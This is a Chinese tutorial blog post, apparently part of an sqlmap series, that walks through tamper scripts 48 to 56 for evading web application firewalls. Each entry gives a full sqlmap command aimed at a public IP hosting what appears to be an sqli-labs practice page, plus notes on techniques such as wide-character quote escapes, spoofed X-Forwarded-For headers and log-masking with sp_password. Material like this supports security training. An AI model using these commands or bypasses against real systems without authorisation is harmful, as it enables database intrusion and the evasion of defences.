sqlmap oracle绕过,sqlmap从入门到精通-第七章-7-23 绕过WAF脚本-剩下所有的绕过脚本-终结...

48. sp_password.py脚本

在payload语句后面添加sp_password 这样是为了迷惑数据库日志,适用于所有数据库

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="sp_password.py" --proxy="http://127.0.0.1:8080" -batch

367323d0607f41515f3fda16131e8842.png

edbed184ba31fb30ed1eebf0d8275167.png

发现是可以注入的,看下burp抓包结果

aa4d4cc417e84f145306f1daee60f2ee.png

发现结果是符合预想的,添加了sp_password,不影响结果,而且是可以正常注入的

==============================================================================================================================================================================================================

49. symboliclogical.py脚本

使用"&&"(%26%26)替换"and",使用"||"(%7C%7C)替换"or" 适用于所有数据库

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="symboliclogical.py" --proxy="http://127.0.0.1:8080" -batch

0ae36b578115052528e8b3d3636eff66.png

4f244548c1bd0d74d9ad3453a2a0fccb.png

确认目标是可以正常注入的,我们看下burp抓包效果

bcafc052e173214616175a5e5cdc6a71.png

达到效果,使用&&替换and

========================================================================================================================================================================================================

50. unionalltounion.py脚本

使用union select 替换union all select 适用于所有数据库

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="unionalltounion.py" --proxy="http://127.0.0.1:8080" -batch

6c24e1e3400347173e3801b1bade12ae.png

431f6d76c0f394e78f499a8448002946.png

可以正常的进行sql注入,看burp抓包结果

6a6aab68a136b11217c2f359d7848ed8.png

看到的最终结果是没有带all的union查询,具体大家可以再去测试

============================================================================================================================================================================================================

51. unmagicquotes.py脚本

使用宽字符“ ’”(编码值为%bf%27) 绕过GPC addslashes 适用于所有数据库

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="unmagicquotes.py" --proxy="http://127.0.0.1:8080" -batch

add28e2e37c9ce86939291d6f727ef8c.png

002810235747d8c9267083829fbb432f.png

结果是可以注入的,我们看看brup抓包情况

b8f80a3ce530d3c5ddea24d7b8698b25.png

效果明显,加了宽字符,%bf%27

===============================================================================================================================================================================================================

52. uppercase.py脚本

将测试的payload大写,适用于所有数据库

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="uppercase.py" --proxy="http://127.0.0.1:8080" -batch

72b4470a835af84befb2c69892bcc293.png

2029cf378781f641ad42a48b55c2edb6.png

这个绕过参数只是变大写,是可以正常注入的,我们看下brup抓包结果,验证我们的预期猜想

096ba372afdf4ce58a0bdc02eb60816b.png

看的出来都是大写

===============================================================================================================================================================================================================

53. varnish.py脚本

添加一个HTTP头 "X-originating-IP" 来绕过WAF,适用于所有数据库

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="varnish.py" --proxy="http://127.0.0.1:8080" -batch

0114d7cf1b3ea63160a5e86f2ccc818d.png

d1d93d0098d08396c46075fb33dc32bf.png

可以正常注入,看看burp抓包的结果是否含有此绕过参数添加的HTTP请求头

ac5383dc1fad342d50437e1e85191cc1.png

确实添加了一个HTTP头,效果明显

===============================================================================================================================================================================================================

54. versionedkeywords.py脚本

对不是函数的关键字进行注释 适用于mysql数据库

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="versionedkeywords.py" --proxy="http://127.0.0.1:8080" -batch

cbd5727571d5f99516d7e565d529f23a.png

34a7295c96083b1dc093feb95fb96a5d.png

看burp抓包效果

afe83ff0bc69e8f259df5ee1a9d8730f.png

效果很明显,对不是函数的关键字进行了注释

==============================================================================================================================================================================================================

55. versionedmorekeywords.py脚本

注释每个关键字,这个是适用于数据库为mysql>=5.1.13

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="versionedmorekeywords.py" --proxy="http://127.0.0.1:8080" -batch

f843b1d085626f1a30bc16b9633f6198.png

3019f3bb15f534fa5bb1aaa7e186a040.png

burp抓包结果查看

b55f6c38b6dd17c3fd37b55d6afc5b66.png

上图中看下面的解码确实是每个关键字都注释了

===============================================================================================================================================================================================================

56. xforwardedfor.py脚本

添加一个伪造好的HTTP头,"X-Forwarded-For" 用来绕过WAF,适用于所有数据库

测试地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="xforwardedfor.py" --proxy="http://127.0.0.1:8080" -batch

853df5fa80ae65a2f3055181e762dfd1.png

6907c31b10a7766c9231b181041b22a1.png

burp的抓包结果

577795c2e07a1abaf2b0d786756398de.png

这里的效果是非常好非常明显,不仅仅加了X-Forwarded-For还加了其他常见的HTTP头,并且添加了随机的ip地址

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值